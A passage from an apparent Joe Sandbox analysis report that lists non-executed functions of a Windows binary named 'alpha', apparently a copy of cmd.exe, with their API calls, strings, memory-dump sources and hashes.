                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction ID: 08bfc19c71f091ed5aee499db9d885408c3def87804c3ff2857b07183fdd1771
                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction Fuzzy Hash: 44F0BE66B09BC240EA409B57B940129A2909B88FF4B8C8330EB7D47BC9DE3CD8528300

                                      Non-executed Functions

                                      Function 00007FF755CA5B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                      • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                      • API String ID: 1388555566-2647954630
                                      • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                      • Instruction ID: dfc3dd9d6f4f2cad6d6c352a67d7b83d4b2bdb94e8252a9e93b1e1278fb3bfe7
                                      • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                      • Instruction Fuzzy Hash: F3A2A4BBA0878386EB50AB21E4541B9FBA1FB89F48F889535DA1E47794DF3CD444C720
                                      Function 00007FF755CAE680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                      • String ID: &<|>$+: $:$:EOF$=,;$^
                                      • API String ID: 511550188-726566285
                                      • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                      • Instruction ID: a5486c28e2fc63e942fbb63dba972026fefcf770199ea842301f302a067ae63d
                                      • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                      • Instruction Fuzzy Hash: 1C52C2ABE0869386EB64AB24E414279FAA0FB46F58FCC4535D94E43794DF3CE841C760
                                      Function 00007FF755CA9E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmp$wcschr$wcstol
                                      • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                      • API String ID: 1738779099-3004636944
                                      • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                      • Instruction ID: e0c0709302f5637f6a18682d07c3265e322e9f296710ee37984746956da49e76
                                      • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                      • Instruction Fuzzy Hash: 42727EBBE086438AEB50AB65D4042BDBBA1FB44F4CF888535DE0D57B94DE3CA855C360
                                      Function 00007FF755CC7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F44
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC7F5C
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F9E
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7FFF
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8020
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8036
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8061
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8075
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC80D6
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC80EA
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8177
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC819A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81BD
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81DC
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81FB
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC821A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8239
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8291
                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82D7
                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82FB
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC831A
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8364
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8378
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC839A
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83AE
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83E6
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8403
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8418
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                      • API String ID: 3637805771-3100821235
                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction ID: 2d25489c8d181c2dc94be42cd86b9f12feab3f75d1d1712156a6a443c460aaba
                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction Fuzzy Hash: 14E194BBA046938AE750EB51E40417AFBA1FB49F99BC89235CD1E93790DF3CA445C720
                                      Function 00007FF755CA3F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                      • String ID: %s$%s
                                      • API String ID: 3623545644-3518022669
                                      • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                      • Instruction ID: bddf133d20673893853bf211d4f59680652121291cfa981a932bb4bc0643ee1e
                                      • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                      • Instruction Fuzzy Hash: 98D2C7BBA0868386EB64AB61D4402BDB7A1FB45F5CF981139DA5E47B94DF3CE800C710
                                      Function 00007FF755CA2C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                      • String ID: %9d$%s
                                      • API String ID: 4286035211-3662383364
                                      • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                      • Instruction ID: 27647bcc11e8c6c65592952dbd61f6f7e3992370d3d4d2e9d5bcd47fa42ce5f6
                                      • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                      • Instruction Fuzzy Hash: F052B57BA08A838AEB60AB20D8502FDB7A0FB85F5CF885135DA1E47B94DF3CD5458710
                                      Function 00007FF755CB18D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcsrchr$towlower
                                      • String ID: fdpnxsatz
                                      • API String ID: 3267374428-1106894203
                                      • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                      • Instruction ID: eee173852fae0986c60b038432868019c36839b361671b3f012eba357d500b7f
                                      • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                      • Instruction Fuzzy Hash: 6F42BFBBB09A8385EB64AF2595042B9A7A1FF45FA8FD84135DE0E47784DF3CE8418310
                                      Function 00007FF755CA7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                      • String ID: DPATH
                                      • API String ID: 95024817-2010427443
                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction ID: 17ec2e23ce6083fa4e86844201c20c1a3b0f398a8662be62575ee5a4599a0a5b
                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction Fuzzy Hash: 8212C8BBA0868386E764AF11A440179FBA1FF89F59F889179EA5E47794DF3CD400CB10
                                      Function 00007FF755CA5240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: [...]$ [..]$ [.]$...$:
                                      • API String ID: 0-1980097535
                                      • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                      • Instruction ID: 7b12a3413928356230ae093d7135840b01057ac0d49657d8ea6cde634e711ecc
                                      • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                      • Instruction Fuzzy Hash: 9532BFBBA0878386EB60EB60E8402F9B7A0EB45F8CF885135DA5D47695DF3CE545C720
                                      Function 00007FF755CA6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      • API String ID: 1795611712-3662956551
                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction ID: 458b22ada00aa02fd7f885a4b2b95b088bc0633d77c8d99afef250876525c204
                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction Fuzzy Hash: D3E1A2ABE0864386E750AB64E8401BDEAA1FF44F8DFDC5531DA0E47695EE3CE544C320
                                      Function 00007FF755CCEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsupr.MSVCRT ref: 00007FF755CCEF33
                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEF98
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFA9
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFBF
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CCEFDC
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFED
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF003
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF022
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF083
                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF092
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF0A5
                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF755CCF0DB
                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF135
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF16C
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF185
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                      • String ID: <noalias>$CMD.EXE
                                      • API String ID: 1161012917-1690691951
                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction ID: 7f85f301128a83fe36914602a667398bcf9620d9622955d0ff0358fb50793b3b
                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction Fuzzy Hash: 5F91A3ABB0868386FB55BB60D8001BDAAA0AF4AF5DFCC5135DD1E426D5DF3CA445C320
                                      Function 00007FF755CA32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA32F3
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF755CA32A4), ref: 00007FF755CA3309
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CA3384
